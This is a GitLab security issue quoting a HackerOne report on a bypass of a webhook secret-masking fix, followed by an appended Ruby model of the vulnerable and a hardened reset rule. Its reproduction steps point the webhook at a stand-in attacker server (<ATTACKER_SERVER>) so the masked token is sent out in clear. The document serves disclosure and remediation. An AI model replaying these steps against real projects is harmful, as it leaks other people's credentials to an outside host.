Maintainer can leak masked webhook secrets by adding a new parameter to the webhook URL to bypass the newly added validation logic
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1871136 by 0xn3va
on 2023-02-12, assigned to @rshambhuni:
Report
Summary
There is a vulnerability #385118 (closed) that was fixed and disclosed recently. The fix adds an extra check in case the URL changes:
```ruby
# https://gitlab.com/gitlab-org/gitlab/-/commit/7f34991ae36f1804610ba9980e31191394c8b208
# ...
before_validation :reset_url_variables, unless: ->(hook) { hook.is_a?(ServiceHook) }
# ...
def reset_url_variables
  # The reset only runs when the URL changed and url_variables did not
  self.url_variables = {} if url_changed? && !encrypted_url_variables_changed?
end
```
However, reset_url_variables will return false if the URL variables have also been changed. This allows bypassing the check by adding a new variable to the modified URL.
Steps to reproduce
As a project owner
- Create a project
- Add another user to the project as a maintainer
- Go to Settings > Webhooks
- Put the URL https://example.com?token=secret-token
- Click to add a mask
- Add the value secret-token with the replacement TOKEN
- Click save for the webhook
As a maintainer
- Open the project
- Go to Settings > Webhooks
- Click edit on the webhook
- Edit the URL to your controlled server like this: https://<ATTACKER_SERVER>?token={TOKEN}&a=aaaaa
- Add the value aaaaa with the replacement A
- Save the webhook
- Now click Test to send a request
- Check your server logs; it will contain the secret in plain text
Impact
This vulnerability allows an attacker with the Maintainer role to leak webhook secrets.
What is the current bug behavior?
Adding or deleting a new secret does not reset the previously saved ones
What is the expected correct behavior?
Adding or deleting a new secret resets the previously saved ones
Relevant logs and/or screenshots
Screen_Recording_2023-02-12_at_12.55.50.mov
Output of checks
This bug happens on GitLab.com
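The reset rule quoted in the Summary and the reproduction steps above, modelled as an added example that is not code from the report or from GitLab: a plain-Ruby stand-in for the vulnerable rule beside a hardened one. Assumptions: an edit merges newly submitted variables into the stored ones, delivery expands {NAME} placeholders from the stored hash, and the maintainer's host name is a constructed sample.

```ruby
PLACEHOLDER = /\{(\w+)\}/

# Vulnerable rule, modelled on the callback quoted in the Summary: the reset
# fires only when the URL changed AND url_variables did not, so submitting any
# new variable alongside the new URL leaves the old masked secret in place.
def vulnerable_store(old_url:, old_vars:, new_url:, submitted_vars:)
  vars = old_vars.merge(submitted_vars)
  vars = {} if new_url != old_url && vars == old_vars
  vars
end

# Hardened rule (an assumption for this example, not GitLab's actual fix): any
# URL change discards every previously stored variable, so only values typed in
# by the editor of the new URL can ever be interpolated into it.
def hardened_store(old_url:, old_vars:, new_url:, submitted_vars:)
  return old_vars.merge(submitted_vars) if new_url == old_url
  submitted_vars.dup
end

# Placeholders referenced by the URL with no stored value; a hardened save
# should reject the webhook when this list is non-empty.
def undefined_placeholders(url, vars)
  url.scan(PLACEHOLDER).flatten.uniq - vars.keys
end

# Expand placeholders the way delivery would; unknown names stay literal.
def interpolate(url, vars)
  url.gsub(PLACEHOLDER) { |m| vars.fetch(Regexp.last_match(1), m) }
end

# Replay the report's steps with constructed sample values: the owner stored a
# masked token, then a maintainer re-points the URL at another host while
# adding an unrelated variable in the same edit.
def replay(store)
  old_url  = "https://example.com?token={TOKEN}"
  old_vars = { "TOKEN" => "secret-token" }
  new_url  = "https://maintainer-host.invalid?token={TOKEN}&a={A}"
  vars = store.call(old_url: old_url, old_vars: old_vars,
                    new_url: new_url, submitted_vars: { "A" => "aaaaa" })
  { vars: vars, delivered: interpolate(new_url, vars),
    undefined: undefined_placeholders(new_url, vars) }
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable: #{replay(method(:vulnerable_store))[:delivered]}"
  puts "hardened:   #{replay(method(:hardened_store))[:delivered]}"
end
```

With the vulnerable rule the delivered URL carries secret-token in clear; with the hardened rule the stale {TOKEN} placeholder is undefined and the save should be refused.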